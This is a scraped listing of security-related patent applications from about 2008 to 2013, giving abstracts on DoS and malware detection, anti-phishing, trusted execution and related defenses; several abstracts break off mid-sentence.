20120291128System and Method for Location, Time-of-Day, and Quality-of-Service Based Prioritized Access Control - A priority server for a provider network includes a traffic volume detection module, a traffic analyzer module, and a rules module. The traffic volume detection module receives operational information from the provider network and determines that a host is experiencing a flash event based upon the operational information. The traffic analyzer module determines that the flash event is not a distributed denial of service attack on the host. When it is determined that the flash event is not a distributed denial of service attack, the rules module provides a priority rule to an access router that is coupled to the host.11-15-2012
20120291127DISTINGUISHING BETWEEN BLUETOOTH VOICE AND DATA LINKS - Techniques are provided for receiving a transmitted first packet that was formatted using a known scrambling algorithm with an unknown scrambling seed. An encoded packet payload is extracted from the first packet header. The encoded packet payload header is decoded to obtain a first scrambled packet payload header. For each potential value of the unknown seed, the first scrambled packet payload header is descrambled to produce a first set of descrambled packet payload headers and for each potential value of initial register values associated with a cyclic redundancy check, the cyclic redundancy check is executed comprising polynomial division on each of the descrambled packet payload headers such that when the polynomial division results in a zero remainder, a potential unscrambled payload header for the first packet is obtained. Information about the first packet is obtained from the potential unscrambled payload header.11-15-2012
20090126013SYSTEMS AND METHODS FOR DETECTING CHILD IDENTITY THEFT - Embodiments of the present invention provide systems and methods for detecting an indication of a suspicious event associated with personal information of a child. Personal information representing a social security number of the child and a name of the child is received. Parent personal information representing contact information for a parent of the child is received. A child file for the child is created and stored on a computer-readable medium. The child file for the child includes the personal information representing the social security number of the child and the name of the child. The child file for the child is locked by associating an electronic notice to the child file for the child to prevent access to a database using at least part of the personal information of the child. The database includes credit data. The child file and the credit data is monitored for the indication of the suspicious event using the personal information representing the social security number of the child. A notification is transmitted to the parent using the parent personal information representing contact information for the parent. The notification is transmitted after detecting the indication of the suspicious event. The notification includes information associated with the indication of the suspicious event.05-14-2009
20090288164DIGITAL FORENSIC ANALYSIS USING EMPIRICAL PRIVILEGE PROFILING (EPP) FOR FILTERING COLLECTED DATA - A forensic device allows a user to remotely interrogate a target computing device in order to collect and analyze computer evidence that may be stored on the target computing device. The forensic device acquires the computer evidence from the target computing device and filters the computer evidence using an application-specific system-level privilege profile that describes the aggregate exercise of system-level privileges by a plurality of software application instances executing throughout an enterprise. The forensic device presents a user interface through which the remote user views the filtered computer evidence acquired from the target computing device. In this manner, forensic device allows the user to filter the collected computer evidence to data that is likely to have forensic relevance.11-19-2009
20090288162SYSTEM AND METHOD FOR DEFENDING AGAINST DENIAL OF SERVICE ATTACKS ON VIRTUAL TALK GROUPS - In one embodiment, a method includes establishing a first virtual talk group (VTG) that includes a plurality of endpoints and has a first multicast address. The plurality of endpoints includes a first endpoint and a second endpoint. The method also includes monitoring traffic associated with the first VTG, determining when a denial of service (DOS) attack is indicated by the traffic, and identifying at least one rogue endpoint responsible for the DOS attack when it is determined that the DOS attack is indicated. The first endpoint and the second endpoint are notified that they are to participate in a dynamic switchover to a second VTG when a DOS attack is indicated. The second VTG is established using a second multicast address, and includes the first endpoint and the second endpoint, but not the rogue endpoint.11-19-2009
20090089877DYNAMIC EMAIL DIRECTORY HARVEST ATTACK DETECTION AND MITIGATION - Dynamic directory harvest attack detection and mitigation system is accomplished by altering the logic surrounding how a receiving email server enforces its email delivery rules. The email server's assumed response to received emails is changed when it is determined that the server is under attack, thereby foiling the unauthorized acquisition of valid email addresses and other information retained by the email server.04-02-2009
20090089878System and Method for Detecting Multi-Component Malware - Malicious behavior of a computer program is detected using an emulation engine, an event detector and an event analyzer. The emulation engine includes a system emulator configured to emulate, in an isolated computer environment, at least a part of a computer system and a program emulator configured to emulate in the isolated computer environment execution of the computer program, including execution of a plurality of executable components of the computer program, such as execution processes and threads. The event detector is configured to monitor events being generated by two or more of the executable components. The event analyzer is configured to determine, substantially in real time, based at least on one or more events generated by each of two or more of the plurality of executable components whether or not the computer program exhibits malicious behavior, wherein individually one or more of the plurality of executable components may exhibit benign behavior.04-02-2009
20110173696QUANTUM COMMUNICATION SYSTEM AND METHOD - A quantum communication system, said system comprising: 07-14-2011
20120144482Method and System for Whitelisting Software Components - A method and system for whitelisting software components is disclosed. In a first operating environment, runtime information may be collected about a first loaded and executing software component. The collected information may be communicated to a second software component operating in a second operating environment that is isolated from the first operating environment. The collected runtime information may be compared with a validated set of information about the first software component. Other embodiments are described and claimed.06-07-2012
20110173697SYSTEM AND METHOD FOR DETECTING AND PREVENTING DENIAL OF SERVICE ATTACKS IN A COMMUNICATIONS SYSTEM - A method and system are provided for use in detecting and preventing attacks in a communications network. In one example, the method includes calculating first and second traffic volumes based on messages received at a first time and a second time, respectively. An average acceleration is calculated based on the first and second traffic volumes, and the method identifies whether the average acceleration has crossed a threshold. The messages are serviced only if the average acceleration has not crossed the threshold.07-14-2011
20090276850CONTENT SCREENING METHOD, APPARATUS AND SYSTEM - A content screening method, apparatus and system are provided for a content screening component to verify the trust relationship and the categorization standard used by a categorization component. A method includes the following steps: the content screening component receives a categorized content; and when determining that a first categorization component that categorizes the content is trustworthy according to the information of the categorization component carried in the categorized content, the content screening component screens the content by the content category carried in the categorized content. Another method includes the following step: when determining that the categorization component that categorizes the content uses the same categorization standard as the content screening component according to the information of the categorization component carried in the categorized content, the content screening component screens the content by the content category carried in the categorized content.11-05-2009
20090282476Hygiene-Based Computer Security - A reputation server is coupled to multiple clients via a network. Each client has a security module that detects malware at the client. The security module computes a hygiene score based on detected malware and provides it to the reputation server. The security module monitors client encounters with entities such as files, programs, and websites. When a client encounters an entity, the security module obtains a reputation score for the entity from the reputation server. The security module evaluates the reputation score and optionally cancels an activity involving the entity. The reputation server computes reputation scores for the entities based on the clients' hygiene scores and operations performed in response to the evaluations. The reputation server prioritizes malware submissions from the client security modules based on the reputation scores.11-12-2009
20090282478METHOD AND APPARATUS FOR PROCESSING NETWORK ATTACK - A network attack processing method and a processing apparatus are disclosed herein. The method may include: after determining an attacked object, searching for a recorded attack event related to the attacked object to determine a controlled host in an attack network; searching for a recorded control event related to the controlled host to determine a controlling host in the attack network; and determining a detected host which performs similar communication with the multiple controlling hosts as an attack manipulator. Accordingly, embodiments of a processing apparatus adapted to perform the methods are disclosed herein.11-12-2009
20090282477METHOD FOR VALIDATING AN UNTRUSTED NATIVE CODE MODULE - A system that validates a native code module. During operation, the system receives a native code module comprised of untrusted native program code. The system validates the native code module by: (1) determining that code in the native code module does not include any restricted instructions and/or does not access restricted features of a computing device; and (2) determining that the instructions in the native code module are aligned along byte boundaries such that a specified set of byte boundaries always contain a valid instruction and control flow instructions have valid targets. The system allows successfully-validated native code modules to execute, and rejects native code modules that fail validation. By validating the native code module, the system facilitates safely executing the native code module in the secure runtime environment on the computing device, thereby achieving native code performance for untrusted program binaries without significant risk of unwanted side effects.11-12-2009
20090288161METHOD FOR ESTABLISHING A TRUSTED RUNNING ENVIRONMENT IN THE COMPUTER - The present invention discloses a method for establishing a trusted running environment in a computer. A trusted file authentication module and a trusted process memory code authentication module are preset in operation system (OS) of the computer and a secured OS is loaded and run. The trusted file authentication module intercepts all file operation behaviors, checks whether current file to be operated is a trusted file or not, and processes the file according to its operation type if it is trusted, otherwise processes the file after its eligibility is verified; the trusted process memory code authentication module authenticates on timing whether the running state and the integrality for all process code are normal or not; if any process is abnormal, giving an alarm, saving field data run by the process and closing down the process; otherwise continuing to run normally. With this invention, the security for the running environment in the computer can be ensured whether the attack from known or unknown virus exists or not, and this facilitates application and reduces implementation cost.11-19-2009
20100287614Decoding method for a probabilistic anti-collusion code comprising the selection of the collusion strategy - The invention relates to a decoding method for a probabilistic anti-collusion code aiming to identify at least one sequence of the code present in a multimedia content having served in the creation of an illegal copy of the multimedia content, this method comprising a step of selection of the collusion strategy used to constitute the illegal copy from among a set of collusion strategy models. In addition, the invention relates to a method for filtering sequences of a probabilistic anti-collusion code for the decoding of this code aiming to identify at least one sequence of the code present in a multimedia content having served in the creation of an illegal copy of the multimedia content comprising a step of selection of a sub-group of the smallest possible sequences of code containing at least one sequence present in a multimedia content having served in the creation of the illegal copy by comparing for each sequence of the code and for a selected given symbol index, the symbol of the sequence of the code with the symbol of the sequence contained in the illegal copy.11-11-2010
20120297477DETECTION OF ACCOUNT HIJACKING IN A SOCIAL NETWORK - To protect a user of a social network, the user's activity is monitored during a baseline monitoring period to determine a baseline activity record. If subsequently monitored activity of the user deviates sufficiently from the baseline activity record to indicate abuse (hijacking) of the user's account, the abuse is mitigated, for example by notifying the user of the abuse. Monitored activity includes posting links, updating statuses, sending messages, and changing a profile. Monitoring also includes logging times of the user activity. Monitoring anomalous profile changes does not need a baseline.11-22-2012
20120297478METHOD AND SYSTEM FOR PREVENTING DNS CACHE POISONING - A method for preventing the poisoning of at least one DNS cache (11-22-2012
20120297479METHOD FOR EXECUTING AN APPLICATION - A method for executing an application (A) which includes executable native or interpretable code and calls functions of an operating system (BS), whereby the operating system (BS) transmits a result of the respective function call (f11-22-2012
20080276314SOFTWARE PROTECTION INJECTION AT LOAD TIME - A method to apply a protection mechanism to a binary object includes using operating system resources to load a binary object from a storage medium along with a manifest and a digital signature. Authentication of the binary object is performed using the digital signature and the manifest is read to determine a category of protection for the binary object. The operating system selects a protection mechanism corresponding to the protection category and injects protection mechanism code, along with the binary object into a binary image on computer RAM. When the binary image is accessed, the protection mechanism executes and either allows full access and functionality to the binary object or prevents proper access and operation of the binary object. The protection mechanisms may be updated independently from the information on the storage medium.11-06-2008
20110209215Intelligent Network Security Resource Deployment System - An electronic communication network includes a connectivity subsystem and security scanning resources. The connectivity subsystem checks the present trust level of the source of received traffic to determine if security scanning resources are to be used and how to use the security scanning resources.08-25-2011
20080209552IDENTIFYING POTENTIALLY OFFENDING CONTENT USING ASSOCIATIONS - Methods for identifying potentially harmful, malicious, or unwanted content based upon associations with known offenders are provided. Executable content associated with a domain is identified. The executable content URL and the domain are compared to URLs/domains known to be associated with malicious content. If the URL and/or the domain has been identified as associated with offending code, the remaining domain contents and any available associated information are examined to identify any referencing domains, referenced domains, linking domains, affiliated entities, etc. Each identified domain, affiliate, etc. is subsequently examined in a similar manner to identify any domain, entity, etc. having an association with malicious content. Each identified domain, entity, etc. is assigned a suspicion level based upon proximity to the source of the offending code. If desired, relationships among the domains, entities, and the like may be relationally mapped to render associations easier to identify.08-28-2008
20080216175COMPUTATIONAL SYSTEM INCLUDING MECHANISMS FOR TRACKING TAINT - Mechanisms have been developed for securing computational systems against certain forms of attack. Taint status for data accessible by processes is selectively maintained and propagated in correspondence with information flows of instructions executed by a computing system, so that a security (or other appropriate) response can be provided if and when a control transfer (or other restricted use) is attempted based on tainted data. One response that may be triggered is a change in the privilege level (root and guest) that is used to process code executing in a virtual environment, so as to allow remediation to be performed. The triggering events may be specified in a control block.09-04-2008
20100005528METHODS FOR HOOKING APPLICATIONS TO MONITOR AND PREVENT EXECUTION OF SECURITY-SENSITIVE OPERATIONS - The present invention discloses methods and media for hooking applications to monitor and prevent execution of security-sensitive operations, the method including the steps of: reading at least one configuration parameter list from a configuration module; hooking, by a hooking engine, a hooking point in an application, wherein the hooking point is defined in the configuration module; calling, by the application, the hooking point during operation of the application; matching at least one hooking parameter in the hooking point to at least one configuration parameter in at least one configuration parameter list; and upon detecting a match between the hooking parameter and at least one configuration parameter, performing at least one configuration-defined action. Preferably, the method further includes the step of: updating a state of the hooking engine. Preferably, the hooking engine is operative to prevent malicious operations by obfuscated code.01-07-2010
20090007266Adaptive Defense System Against Network Attacks - A system and method according to the invention provide an efficient resource allocation when receiving connection requests from different servers for data transfer and the efficient resource allocation is achieved by identifying and assigning a quality factor to each originating server. When an originating server presents an abusive behavior, it may be assigned to a state that has a low quality factor, thus receiving little resource from the system.01-01-2009
20100146621METHOD OF EXTRACTING WINDOWS EXECUTABLE FILE USING HARDWARE BASED ON SESSION MATCHING AND PATTERN MATCHING AND APPARATUS USING THE SAME - A method and apparatus for extracting a windows executable file that can search for a pattern related to windows executable files among a large quantity of network packets using a hardware-based session tracking and pattern matching technology and that can extract all packets included in the corresponding session are provided. The method of extracting a windows executable file includes: collecting incoming packets having a payload according to a session of a reference packet having an MZ pattern; performing a portable executable (PE) pattern matching for the collected incoming packets; and forming a PE file based on at least one incoming packet satisfying the PE pattern matching.06-10-2010
20110209217INFORMATION PROCESSING APPARATUS, INFORMATION PROCESSING METHOD, AND PROGRAM - There is provided a PC including a guest OS group which manages a group including an OS executed in an office, an information-management section which manages communication capability information which is set to communication-capable information or communication-incapable information, a being-inside-office determination processing section which determines whether or not the PC is used in the office, which sets the communication capability information to the communication-capable information when the being-inside-office determination processing section determines that the PC is used in the office, and which sets the communication capability information to the communication-incapable information when the being-inside-office determination processing section determines that the PC is not used in the office, and a communication control section which controls communication with another device performed by an OS execution section which executes the OS included in the group based on the communication capability information.08-25-2011
20110209216METHOD AND SYSTEM FOR WEBSITE DATA ACCESS MONITORING - In a network comprising a number of web sites and at least one simulator, web page calls are simulated or monitored and the responses to the calls, including content, re-directed calls and cookies, are examined in order to identify whether the content of cookies has been written or modified illegally. Illegal modification of content of cookies is referred to as writing of data by a Buyer in cookies of a User that was directed to the Buyer by a Data Publisher, without the consent of the Data Publisher. In some embodiments, when illegal cookies are identified an alert may be issued to a user.08-25-2011
20080250497STATISTICAL METHOD AND SYSTEM FOR NETWORK ANOMALY DETECTION - An anomaly detection method and system determine network status by monitoring network activity. A statistics based profile for said network over a period is generated to analyze potentially anomalous network activity to determine if said network activity is anomalous by comparing current activity against the profile. Using the profile as a reference, the anomaly detection system and process estimate and prioritize potentially anomalous network activity based on the probability that the behavior is anomalous. The level of severity that the anomaly detection process uses to determine if an alarm is needed is based on comparing user-adjustable thresholds to the current probability. If the threshold has been breached, the user is alerted, subject to other quality checks. After a reporting cycle concludes, the anomaly detection system and process recompiles the statistics based profile to take into account the information observed in the previous reporting cycle.10-09-2008
20120144483METHOD AND APPARATUS FOR PREVENTING NETWORK ATTACK - The present disclosure relates to the communication field, and discloses a method for preventing a network attack. The method includes: receiving a packet; when the received packet is a first packet, determining whether the source IP address and source MAC address information that are carried in the first packet exist in a first record table; if so, obtaining a second packet, the source addresses of which are the same as the source addresses of the first packet, and sending the second packet to a CPU for processing. Through this method, a network attack can be prevented effectively, and a packet can be sent to the CPU for processing only once the validity of the packet is determined. Therefore, applications that require sending packets to the CPU for processing are supported. The present disclosure further discloses an apparatus for preventing a network attack.06-07-2012
20090265782MOBILE STATION AND METHOD FOR AVOIDING ATTACKS - A mobile station wirelessly communicates with an access point during an awake mode of the mobile station through a wireless network and avoids attacks from an attacking station. The mobile station includes a detecting module, an attack-proof module, and a data transmission module. The detecting module is configured for detecting a fake null frame from the wireless network during the awake mode. The fake null frame is for interrupting communication between the mobile station and the access point in order for the mobile station to enter a power saving mode. The attack-proof module is configured for transmitting an attack-proof frame to the access point so as to notify the access point that the mobile station has not entered into the power saving mode. The data transmission module is for transmitting data to the access point and receiving data from the access point. A method for avoiding attacks is also provided.10-22-2009
20090265781Location information verification - Location information is provided with an authenticator in order to enable future providing of an authentication to a service or application making use of the location information. The authenticator is based on a cryptographic method known by the provider and the recipient of the location information, and also optionally based on position data provided by the location information. The authenticator is carried as a watermark in the location information so that the location information can be used by prior existing systems and enables the authentication of the location information in compatible authentication-enabled systems. On receiving the location information, an authentication-enabled recipient obtains the authenticator from the location information and checks, using the authenticator, whether use of the location information may be allowed.10-22-2009
20090265780 ACCESS EVENT COLLECTION - On-line and computationally efficient methods and systems are provided for back-resolving path names of files from inode numbers during data access request processing. As a result, a near real-time recording of data access events is achieved, including identification of the user who performed the access, and the full path name of the data object that was accessed. In a typical application, access events are collected for use in access control of storage elements in complex organizational file systems. 10-22-2009
20090064331 System and method for preventing detection of a selected process running on a computer - A system and method are disclosed for preventing detection of a monitoring process running on a computer. A request to access a process file concerning a process running on the computer is received from a user. It is determined whether the process file requested by the user relates to the selected process. If the requested process file does not relate to the selected process, the user is provided with access to the file. 03-05-2009
20080282348 Methods, Devices and Data Structures for Trusted Data - A data structure has within it the following elements: an identification of a data structure type; and a proof that two or more instances of the data structure type are as trustworthy as each other. Methods and devices using such data structures are described. 11-13-2008
20080235796 Circuit Arrangement with Non-Volatile Memory Module and Method for Registering Attacks on Said Non-Volatile Memory Switch - In order to further develop a circuit arrangement ( 09-25-2008
20080235793 INTEGRITY PROTECTION IN DATA PROCESSING SYSTEMS - A method for protecting the integrity of a set of memory pages to be accessed by an operating system of a data processing system, includes running the operating system in a virtual machine (VM) of the data processing system; verifying the integrity of the set of memory pages on loading of pages in the set to a memory of the data processing system for access by the operating system; in response to verification of the integrity, designating the set of memory pages as trusted pages and, in a page table to be used by the operating system during the access, marking non-trusted pages as paged; and in response to a subsequent page fault interrupt for a non-trusted page, remapping the set of pages to a region of the data processing system memory which is inaccessible to the virtual machine. 09-25-2008
20080289038 METHOD AND APPARATUS FOR CHECKING INTEGRITY OF FIRMWARE - Provided are a method and apparatus for checking the integrity of firmware. The method includes storing a first hash function value of unhacked firmware for determining whether actual firmware of an external processor has been hacked; reading the actual firmware via a bus; calculating a second hash function value of the actual firmware; comparing the first hash function value with the second hash function value; and sharing a bus key with the external processor, based on the comparison result. 11-20-2008
20090328208 METHOD AND APPARATUS FOR PREVENTING PHISHING ATTACKS - The disclosure generally relates to a method for preventing phishing attacks on a computer browser. The method includes the steps of: providing a web browser having a bookmark group; directing the browser to a first Uniform Resource Locator (“URL”) having a first URL address, the first URL address having a plurality of alpha-numeric characters pointing to a first IP address; saving the first URL address in the bookmark group as a first bookmark; receiving an email communication containing a second URL address, the second URL address having a plurality of alpha-numeric characters similar to the first URL address and purporting to point to the first IP address; comparing the first URL address with the second URL address; and determining whether the first URL address and the second URL address share an identical IP address. 12-31-2009
20090328209 Simplified Communication of a Reputation Score for an Entity - A reputation server is coupled to multiple clients via a network. A security module in each client monitors client encounters with entities such as files, programs, and websites, and then computes a hygiene score based on the monitoring. The hygiene scores are then provided to the reputation server, which computes reputation scores for the entities based on the clients' hygiene scores and the interactions between the clients and the entity. When a particular client encounters an entity, the security module obtains a reputation score for the entity from the reputation server. The reputation score may comprise a statistical measure based on a number of other trustworthy or “good hygiene” clients that have a hygiene score above a threshold. The client communicates this reputation score to a user with a message indicating that the reputation score is based on other clients deemed trustworthy. 12-31-2009
20090328205 USER ESTABLISHED GROUP-BASED SECURITY FOR USER CREATED RESTFUL RESOURCES - A system for securing user created Web resources that includes a data store and a URI security engine. The data store can store digitally encoded content comprising a set of user created, URI identified resources. The URI security engine can provide declarative instance based URI access control to the user created URI identified resources. The URI security engine can apply semantics of user/group control for accessing the URI identified resource. These controls can be group controlled based upon deployer (creator) established privileges rather than upon explicit developer established privileges, which may not be possible since the resources can be deployer (end-user) created resources not existing at development time. 12-31-2009
20090328210 CHAIN OF EVENTS TRACKING WITH DATA TAINTING FOR AUTOMATED SECURITY FEEDBACK - An automated security feedback arrangement is provided by which a specialized audit record called a tainting record is linked to data crossing the perimeter of a corpnet that comes from potentially untrusted sources. The linked tainting record operates to taint such data which may be received from external sources such as e-mail and websites or which may comprise data that is imported into the corpnet from mobile computing devices. Data that is derived from the original data is also tainted using a linked tainting record which includes a pointer back to the previous tainting record. The linking and pointing back are repeated for all subsequent derivations of data to thus create an audit trail that may be used to reconstruct the chain of events between the original data crossing the perimeter and any security compromise that may later be detected in the corpnet. 12-31-2009
20090328207 VERIFICATION OF SOFTWARE APPLICATION AUTHENTICITY - Various techniques are provided for verifying the authenticity of software applications. Such techniques are particularly useful for verifying the authenticity of software applications used in online transactions involving users, payment service providers, and/or merchants. In one example, a set of application identifiers associated with a plurality of authenticated software applications are maintained and a verification request is received comprising an application identifier associated with an unverified software application. A token is generated in response to the verification request if the application identifier is in the set of application identifiers. The generated token is passed to the unverified software application. A user token is received and processed to determine whether the unverified software application is one of the authenticated software applications. A verification request is sent based on the processing. Additional methods and systems are also provided. 12-31-2009
20090328206 Method for Administration of Computer Security Threat Countermeasures to a Computer System - A countermeasure for a computer security threat to a computer system is administered by establishing a baseline identification of an operating or application system type and an operating or application system release level for the computer system that is compatible with a Threat Management Vector (TMV). A TMV is then received, including therein a first field that provides identification of at least one operating system type that is affected by a computer security threat, a second field that provides identification of an operating system release level for the operating system type, and a third field that provides identification of a set of possible countermeasures for an operating system type and an operating system release level. Countermeasures that are identified in the TMV are processed if the TMV identifies the operating system type and operating system release level for the computer system as being affected by the computer security threat. The received TMV may be mutated to a format for processing of the countermeasure. 12-31-2009
20090328204 INFORMATION SECURITY APPARATUS, SECURITY SYSTEM, AND METHOD FOR PREVENTING LEAKAGE OF INPUT INFORMATION - Provided are an information security apparatus and a security system which prevent eavesdropping on input information input by an input device and identify eavesdroppers. In information security apparatus 12-31-2009
20080250496 Frame Relay Device - A frame relay device includes a table where an entry containing a combination of a MAC address and an IP address is registered to be used in the frame relay processing of a local device. Moreover, the frame relay device includes judgment means for searching the table by the transmission origin MAC address and the transmission origin IP address contained in the received frame and judging whether the combination of the transmission origin addresses is registered as a relay object in the layer 10-09-2008
20080276313 Applianced Domain Name Server - A software installation package for a domain name server (DNS) comprises a hardened operating system, domain name server software, and a management interface. To detect and block attack attempts ( 11-06-2008
20080271143 Insider threat detection - Methods, systems, and computer program products for insider threat detection are provided. Embodiments detect insiders who act on documents and/or files to which they have access but whose activity is inappropriate or uncharacteristic of them based on their identity, past activity, and/or organizational context. Embodiments work by monitoring the network to detect network activity associated with a set of network protocols; processing the detected activity to generate information-use events; generating contextual information associated with users of the network; and processing the information-use events based on the generated contextual information to generate alerts and threat scores for users of the network. Embodiments provide several information-misuse detectors that are used to examine generated information-use events in view of collected contextual information to detect volumetric anomalies, suspicious and/or evasive behavior. Embodiments provide a user threat ranking system and a user interface to examine user threat scores and analyze user activity. 10-30-2008
20100005530 SYSTEM AND METHOD FOR SCANNING MEMORY FOR PESTWARE OFFSET SIGNATURES - Systems and methods for managing pestware processes on a protected computer are described. In one implementation, a reference point in the executable memory that is associated with a process running in the executable memory is located. First and second sets of information from corresponding first and second portions of the executable memory are then retrieved. The first and second portions of the executable memory are separated by a defined offset, and each of the first and second portions of the executable memory is offset from the reference point. The process is identifiable as a particular type of pestware when the first and second sets of information each include information previously found to be separated by the defined offset in other processes that are of the particular type of pestware. In some variations, the reference point is a starting address and/or an API implementation in the process. 01-07-2010
20080209551 File Conversion in Restricted Process - Embodiments are described for removing malicious code from a file in a first file format by converting the file into a converted file of a second file format. In embodiments, converting the file eliminates malicious code embedded within the file from being stored in the converted file. The conversion is performed within a restricted computer process that has restricted privileges limiting its access to an operating system and an underlying computer system. As a result, even if malicious code embedded within the file executes while the file is being converted into the converted file, the damage to a computer system is mitigated because of the limited privileges provided to the restricted process. 08-28-2008
20100138917 REFRESH MECHANISM FOR RATE-BASED STATISTICS - Rate-based statistics are aperiodically refreshed. For example, for each Internet Protocol address being monitored, a time stamp of the last (most recent) statistics object (e.g., packet) and corresponding rate-based statistics are stored. The time stamp of a new statistics object is compared with the stored time stamp. The stored time stamp may be updated, and the stored statistics may be updated or refreshed, depending on the result of the comparison. 06-03-2010
20100138919 SYSTEM AND PROCESS FOR DETECTING ANOMALOUS NETWORK TRAFFIC - A process for detecting anomalous network traffic in a communications network, the process including: generating reference address distribution data representing a statistical distribution of source addresses of packets received over a first time period, the received packets being considered to represent normal network traffic; generating second address distribution data representing a statistical distribution of source addresses of packets received over a second time period; and determining whether the packets received over the second time period represent normal network traffic on the basis of a comparison of the second address distribution data and the reference address distribution data. 06-03-2010
20100138918 Keyboard Security Status Check Module and Method - A keyboard security status check module and method are provided. The module is provided to enable a user to easily check the operating status of a keyboard security program installed in a user terminal. The module includes a keyboard security monitor linked to the keyboard security program and configured to monitor a reception status of key input data protected by keyboard security, and a controller configured to display a dynamic keyboard security check representation on a screen of the user terminal according to the reception status of the key input data monitored by the keyboard security monitor. 06-03-2010
20080271141 PARALLELIZED PATTERN MATCHING USING NON-DETERMINISTIC FINITE AUTOMATA - This disclosure describes techniques of determining whether a symbol stream includes a pattern defined by a regular expression. As described herein, the regular expression may be represented using a non-deterministic finite automaton (NFA). A plurality of states in the NFA may be evaluated in parallel. These states may be associated with a plurality of symbol positions in a symbol stream. Evaluating a plurality of states and symbols in parallel may allow for faster determinations of whether the symbol stream includes the pattern defined by the regular expression. 10-30-2008
20080271142 PROTECTION AGAINST BUFFER OVERFLOW ATTACKS - A system including storage comprising software code and a plurality of data structures. The system also includes processing logic coupled to the storage and adapted to execute the software code. If the processing logic executes a function call instruction, the processing logic stores copies of software code return information to a first data structure location and to a second data structure location. If, after executing a function associated with the function call instruction, the processing logic determines that data from the first and second data structure locations do not match, the processing logic initiates a security measure. The data is associated with the copies. 10-30-2008
20090049545 TOLERATING AND DETECTING ASYMMETRIC RACES - Detecting and/or tolerating races. Races occur due to malicious threads not respecting software locks. A method of detecting and/or correcting races includes making one or more local copies and one or more reference copies of shared data. Any read and write operations performed by a safe thread are caused to be performed on the local copies during a critical section. The critical section defines a time frame during which a variable lock is placed on the shared data. Any read and write operations performed by malicious threads are allowed to be performed on the shared data during the critical section. The shared data, the local copies, and the reference copies are compared to determine whether a race has been detected. An indication can be output that a race has occurred, or the race can be corrected. 02-19-2009
20130219496 SECURITY CONFIGURATION VERIFICATION DEVICE AND METHOD AND NETWORK SYSTEM EMPLOYING THE SAME - The invention discloses a security configuration verification device for performing a security configuration verification on a network device, which comprises: one or more preconfigured scanning policies; a scanning policy generator, which selects a scanning policy from the one or more preconfigured scanning policies to generate a new scanning policy corresponding to the network device; and a scanner, which performs the security scanning on the network device with the generated new scanning policy and thereby performs the security configuration verification. The invention also discloses a corresponding security configuration verification method and a network system employing the verification device. 08-22-2013
20090126014 METHODS AND SYSTEMS FOR ANALYZING SECURITY EVENTS - In one aspect, the technology relates to a method for analyzing a security event in a distributed fashion. The method includes the steps of detecting an occurrence of a security event within a customer network and querying a first component of the customer network for data in response to the detected occurrence of the security event. The method also includes the steps of receiving, by a data monitor located within the customer network, first data from the component in response to the query and determining, based on the received first data, whether to query for additional data. The method additionally includes querying at least one of the first component and another component of the customer network to obtain the additional data in response to the determining step, and analyzing the security event using at least one of the first data and the additional data. 05-14-2009
20090126012 Risk Scoring System For The Prevention of Malware - A method suitable for detecting malicious files includes several steps. A file that is received into a computer system is analyzed to determine a presence or absence of each of a plurality of predefined properties in the file. A score is calculated based on the presence or absence of the plurality of properties in the file. This score is reflective of the risk that the file is malicious. Once the score is calculated, the file can be further processed based on the score. 05-14-2009
20090178137 SYSTEMS AND METHODS FOR SECURELY PROCESSING SENSITIVE STREAMS IN A MIXED INFRASTRUCTURE - A system and method for securely processing sensitive streams in a mixed infrastructure includes analyzing a stream to determine data sensitivity. A likelihood that processing elements employed to process the stream would result in a risk to sensitive information is determined. At least a portion of the data stream having sensitive information is transferred to a secure processing environment to ensure security of the data stream during processing. 07-09-2009
20090165131 DETECTION AND PREVENTION OF MALICIOUS CODE EXECUTION USING RISK SCORING - A system and method for preventing malicious code execution includes detecting a request for execution of a file. The file is scanned for risk before processing the request. A score is assigned to the risk. Execution of the file is either allowed or prohibited responsive to the risk score. 06-25-2009
20090144820 System, Method and Apparatus for Protecting a Network or Device Against High Volume Attacks - The present invention provides a system, method and apparatus for protecting against high volume attacks. The present invention receives a packet, determines a source of the received packet, and updates a tree-based data structure based on the source of the received packet. The received packet is accepted or passed on whenever one or more statistics stored within the tree-based data structure do not exceed a threshold. The received packet is dropped whenever the one or more statistics exceed the threshold. The present invention can be implemented in hardware, software or a combination thereof. The software will implement the steps as one or more code segments of a computer program embodied on a computer readable medium. 06-04-2009
20090138968 DISTRIBUTED NETWORK PROTECTION - A method for processing frames transmitted in a network including nodes and network segments connecting the nodes. Frames transmitted over network segments are detected. Frame information from each detected frame is stored in a frame information repository. A stored hierarchical data structure includes vectors specifying frame information defining frames permitted in the network, classes including vectors with constraints on the vectors, and patterns including classes with constraints on the classes. The frame information in the detected frames may not match the frame information specified in the vectors. The vectors, if matched by the frame information in the detected frames, may not satisfy the constraints in the classes. The vectors, if matched by the frame information in the detected frames, may satisfy the constraints in the classes, and the classes whose constraints are satisfied by the matched vectors may not satisfy the constraints in the patterns. 05-28-2009
20090178139 Systems and Methods of Network Security and Threat Management - The present disclosure generally provides systems and methods of network security and threat management. An exemplary system includes detection and prevention modules (DPM) designed specifically to collect and transmit suspicious binary network packet data. The collected network packets are sent to a behavioral correlation module to perform automatic behavioral correlation: (1) within each DPM, (2) across all DPMs installed on a network, and (3) across all DPMs installed on all networks. The results of the behavioral correlation are sent to a security dashboard module (SDM), which generally acts as a fully integrated Security Event Management system and collects, correlates, and prioritizes global network alerts, local network alerts, posted vendor alerts, and detected network vulnerabilities with enterprise assets. The SDM could display the results in a user-friendly graphical user interface and has the ability to perform geographic mapping of externally generated threats. 07-09-2009
20110225651 Trojan-Resistant Bus Architecture and Methods - A method of securing bus architecture from a Trojan attack. A restricted address access detector generates an unauthorized access detection signal when a master ID signal is within a restricted range. The unauthorized access detection signal disables the requested slave select signal, and the address decoder instead outputs a default slave select signal. A counter determines the duration of a lock signal from a master, and a comparator activates a malicious bus lock signal if the lock signal duration exceeds a threshold. The master mask register forcibly gates the lock signal upon receipt of the malicious bus lock signal. If the duration of a wait request from a slave exceeds a maximum duration register value, a comparator activates a malicious wait detection signal to disable the wait request signal. The method might include storing identifying information about the malicious master and storing a slave ID corresponding to the malicious slave. 09-15-2011
20090064327 Low cost high efficiency anti-phishing method and system called 'safety gates' - A low-cost, secure, reliable, convenient, and efficient method and system for reducing the effectiveness of phishing attacks, which consists in placing before the login page one or several complementary login pages, called ‘safety gates’, which lead to web pages with content known only to the legitimate user, who created the online account and pre-loaded the digital content displayed after login into the ‘safety gate’. 03-05-2009
